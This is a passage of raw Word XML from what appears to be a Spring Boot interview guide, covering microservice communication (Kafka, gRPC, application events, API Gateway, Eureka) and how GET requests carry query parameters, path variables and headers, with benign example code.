          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Sending messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A40FF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ource.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A923A0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C8055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MessageProducer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3280BCCF" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD8168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FE45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essageChannel output;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D63B0" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70960B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473CD4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utput.send(MessageBuilder.withPayload(message).build());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B5F2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35C1D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75A6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sumer (Service B)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Receiving messages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315934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ink.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463FBD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644C8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67DB572C" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AC21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eamListener(Sink.INPUT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8868E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handleMessage(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CBB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5252B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DFA2F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1EC64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sends a message to Kafka (using Spring Cloud Stream), and Service B listens for that message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0632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D90C8">
          <v:rect id="_x0000_i2663" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F496CA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gRPC (Remote Procedure Calls)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED9D1B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is a high-performance RPC framework developed by Google, which uses HTTP/2 and Protobuf (Protocol Buffers) for efficient communication between microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054FB9F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 is used for low-latency, high-performance communication and supports bidirectional streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9E1A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Boot and gRPC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725AAF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the gRPC service using Protobuf:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1648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ntax = "proto3";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEAFCCE" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF136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 MyService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CAEA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pc GetData (Request) returns (Response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AD82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632536" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9768C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quest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519A695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query = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC6F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86E0EC" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506F6E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sponse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE3FB7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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E32C2A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6219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te Java code from the Protobuf definition using protoc compiler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7ACF0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the service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464F7B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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3080F05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Impl extends MyServiceGrpc.MyServiceImplBase {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D911BE9" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E89F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13AB90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getData(Request request, StreamObserver&lt;Response&gt; responseObserver) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D91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 response = Response.newBuilder().setData("Data from gRPC").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D71D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Next(response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259235F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Completed();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752D5F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C248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39E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ient calling the gRPC service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EEA4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dChannel channel = ManagedChannelBuilder.forAddress("localhost", 6565)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383A2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Plaintext()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A7C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uild();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E29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yServiceGrpc.MyServiceBlockingStub stub = MyServiceGrpc.newBlockingStub(channel);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9DC351" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="585AEF3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 request = Request.newBuilder().setQuery("Request data").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3398D7E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 response = stub.getData(request);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099F32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stem.out.println(response.getData());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6BB3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nel.shutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDE23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provides a more efficient communication mechanism compared to traditional REST for certain use cases, especially when performance and scalability are critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB55A5"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8817EE">
          <v:rect id="_x0000_i2664" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E117D6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Event-Driven Architecture (Event Sourcing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30047F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publish and subscribe to </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>events</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These events can be stored in an event store, and other services can subscribe to those events to take action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A77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useful for implementing CQRS (Command Query Responsibility Segregation) or Event Sourcing patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE3AAB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Events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818474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Publisher)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467450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74518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Publisher {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D96AE0" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE5F1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35FA1E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ApplicationEventPublisher publisher;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D3EA60" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD3203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ublishEvent(String data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087D8C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sher.publishEvent(new MyEvent(this, data));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26948C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CDEAC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5B57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Listener)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E55DD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F16F9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Listener {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F748E73" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1589CBB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ventListener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6257E6B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onApplicationEvent(MyEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613AFB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vent received: " + event.getData());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC11C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6E0E9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633BA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 Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C6C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Event extends ApplicationEvent {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35661E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AB344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00CC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Event(Object source, String data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA7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source);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE6EF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ata = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E44FA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2D083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536F7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4FE73D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527D1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A942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AA18F"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AE60B">
          <v:rect id="_x0000_i2665" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F4E64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PI Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783331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can be used to route requests between microservices. The gateway provides a single entry point into the system and can delegate requests to appropriate microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5169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ommon tools: </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Gatewa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Zuu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ong</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Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B70E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API Gateway pattern abstracts the complexity of multiple microservices by acting as a single entry point for client requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E4B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Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40554F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D1A4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loud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAA6C6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ateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CD7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outes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B412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d: serviceA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38AF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 http://localhost:8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AABF8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edicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398320C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ath=/serviceA/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D0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requests to /serviceA/** will be routed to http://localhost:8081.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CDCE0"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81301">
          <v:rect id="_x0000_i2666" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54924C2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Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F3DC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register themselves with a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Registry</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onsul</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) so that other services can discover them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B726A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eliminates the need for hardcoding URLs for communication, as services can look up each other's addresses dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6289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Eureka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624820F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EurekaServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042668C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508E25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urekaServerApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784B55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D142B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EurekaServerApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E65C4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6DB06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165A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figuration (Client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B981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DiscoveryClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4656CC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AE4A7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Application {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FCC3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BD3F3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erviceAApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2ED3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6643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4891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is example, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service A</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will register itself with the Eureka server, and other services can discover it by querying the registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090849C7"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DF37D">
          <v:rect id="_x0000_i2667" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02FAD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735CB4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ynchronous HTTP requests) are commonly used for microservice-to-microservice communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469057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xml:space="preserve">, you can use message brokers lik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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A869E4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high-performance communication, </w:t>
      </w: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can be considered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09722A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can be used to manage and simplify communication between microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5EE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668" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1BDEB" w14:textId="40B7C48B" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="648" w:name="_Toc197867862"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What kind of information are you passing to the GET method</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="648"/>
    </w:p>
    <w:p w14:paraId="424E1298" w14:textId="6589B911"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method, information is typically passed in the form of </w:t>
      </w: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The data passed through GET is typically used to retrieve or filter resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C3B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 are the ways information can be passed to the GET method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7F38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Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46D8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re key-value pairs appended to the URL after a ?. Multiple parameters can be added, separated by &amp;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC07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mon use cases: filtering, sorting, pagination, or searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF06B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158983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department=HR&amp;age=30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED44ED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GET request is passing two query parameters: department and age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E19E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se parameters using @RequestParam:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FE2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15E4C8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04DC07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List&lt;Employee&gt; getEmployees(@RequestParam String department, @RequestParam int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812ACA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filtered by department and age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75B1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30BF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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76347C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String department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A9C2F"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 Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9698B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 variables are part of the URL path itself, often used to uniquely identify a resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D25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ypically used to access specific resources or nested resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A1B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3375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employeeId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612642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employeeId is passed as part of the URL path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C332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 path variable using @PathVariable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D465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752FF19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employeeId}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54D9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 getEmployee(@PathVariable Long employeeId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11289F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 by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E740F5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7E13B7"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eaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C71E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aders are used for passing metadata such as authentication tokens or content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E66E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thorization</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers are often used in secured API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201E5C1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7BFB5B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB4C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horization: Bearer &lt;token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66936F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cess headers in Spring Boot using @RequestHeader:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41328D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4B7A0A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23EB93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Header("Authorization") String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F81E00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with authorization logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C6D0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702C8B"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quest Body (Typically Not for GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E69996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lthough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s are not intended to have a body, some systems or APIs may allow a body to be passed, but this is rare and not recommended for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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542ED42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quests where you need to send a large amount of data, POST, PUT, or PATCH would be more appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D4D1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ED3F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Use @RequestParam for parameters like filters or search criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2D7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xml:space="preserve"> Use @PathVariable for resource identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072BD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ders:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use @RequestHeader for headers like Authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9C7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GET method, the data you pass is typically intended to retrieve or filter resources, not modify them. GET is generally used for read-only requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD38EA" w14:textId="05AF17A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669" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="388C7E56" w14:textId="2CCDD748" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="649" w:name="_Toc197867863"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose I want to start a spring boot application, so what are all the steps</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="649"/>
    </w:p>
    <w:p w14:paraId="086839B9" w14:textId="14681F78" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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tart a Spring Boot application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B1CD1"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Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D30A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ither:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14104F6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nually create the project structure</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C23ED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Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a web-based tool) to generate a skeleton for the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F1889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p>
    <w:p w14:paraId="3B11AB1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Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId15"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2FDDB8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the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F409C2"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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
